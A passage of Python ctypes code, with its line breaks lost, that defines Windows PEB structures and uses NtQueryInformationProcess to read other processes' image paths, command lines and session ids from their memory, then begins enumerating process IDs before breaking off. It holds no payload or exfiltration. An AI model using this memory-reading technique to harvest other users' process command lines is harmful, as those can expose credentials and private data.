RPRTL_USER_PROCESS_PARAMETERS = RPOINTER(RTL_USER_PROCESS_PARAMETERS) PPS_POST_PROCESS_INIT_ROUTINE = PVOID class PEB(ctypes.Structure): _fields_ = (('Reserved1', ctypes.wintypes.BYTE * 2), ('BeingDebugged', ctypes.wintypes.BYTE), ('Reserved2', ctypes.wintypes.BYTE * 1), ('Reserved3', PVOID * 2), ('Ldr', RPPEB_LDR_DATA), ('ProcessParameters', RPRTL_USER_PROCESS_PARAMETERS), ('Reserved4', ctypes.wintypes.BYTE * 104), ('Reserved5', PVOID * 52), ('PostProcessInitRoutine', PPS_POST_PROCESS_INIT_ROUTINE), ('Reserved6', ctypes.wintypes.BYTE * 128), ('Reserved7', PVOID * 1), ('SessionId', ctypes.wintypes.ULONG)) RPPEB = RPOINTER(PEB) class PROCESS_BASIC_INFORMATION(ctypes.Structure): _fields_ = (('Reserved1', PVOID), ('PebBaseAddress', RPPEB), ('Reserved2', PVOID * 2), ('UniqueProcessId', ULONG_PTR), ('InheritedFromUniqueProcessId', ULONG_PTR)) def NtError(status): import sys descr = 'NTSTATUS(%#08x) ' % (status % 2**32,) if status & 0xC0000000 == 0xC0000000: descr += '[Error]' elif status & 0x80000000 == 0x80000000: descr += '[Warning]' elif status & 0x40000000 == 0x40000000: descr += '[Information]' else: descr += '[Success]' if sys.version_info[:2] < (3, 3): return WindowsError(status, descr) return OSError(None, descr, None, status) ntdll = ctypes.WinDLL('ntdll.dll') NtQueryInformationProcess = ntdll.NtQueryInformationProcess NtQueryInformationProcess.restype = NTSTATUS NtQueryInformationProcess.argtypes = ( ctypes.wintypes.HANDLE, PROCESSINFOCLASS, PVOID, ctypes.wintypes.ULONG, PULONG) class ProcessInformation(object): _close_handle = False _closed = False _module_names = None def __init__(self, process_id=None, handle=None): if process_id is None and handle is None: handle = GetCurrentProcess() elif handle is None: handle = OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, False, process_id) self._close_handle = True self._handle = handle if not self._query_info() or (process_id is not None \ and self._process_id != process_id): return def __del__(self, CloseHandle=CloseHandle): if self._close_handle and not self._closed: try: CloseHandle(self._handle) except WindowsError as e: pass self._closed = True def _query_info(self): info = PROCESS_BASIC_INFORMATION() handle = self._handle status = NtQueryInformationProcess(handle, ProcessBasicInformation, ctypes.byref(info), ctypes.sizeof(info), None) if status < 0: return False self._process_id = info.UniqueProcessId self._parent_process_id = info.InheritedFromUniqueProcessId self._peb = peb = info.PebBaseAddress[0, handle] self._params = peb.ProcessParameters[0, handle] Is64Bit = ctypes.c_int32() IsWow64Process(handle, ctypes.byref(Is64Bit)) self._arch = "x86" if Is64Bit.value else "x64" @property def process_id(self): return self._process_id @property def session_id(self): return self._peb.SessionId @property def image_path(self): ustr = self._params.ImagePathName return ustr.Buffer[0, self._handle, ustr.Length] @property def command_line(self): ustr = self._params.CommandLine buf = ustr.Buffer[0, self._handle, ustr.Length] return buf processes = [] count = 32 while True: ProcessIds = (ctypes.wintypes.DWORD*count)() cb = ctypes.sizeof(ProcessIds) BytesReturned = ctypes.wintypes.DWORD() if EnumProcesses(ctypes.byref(ProcessIds), cb, ctypes.byref(BytesReturned)): if BytesReturned.value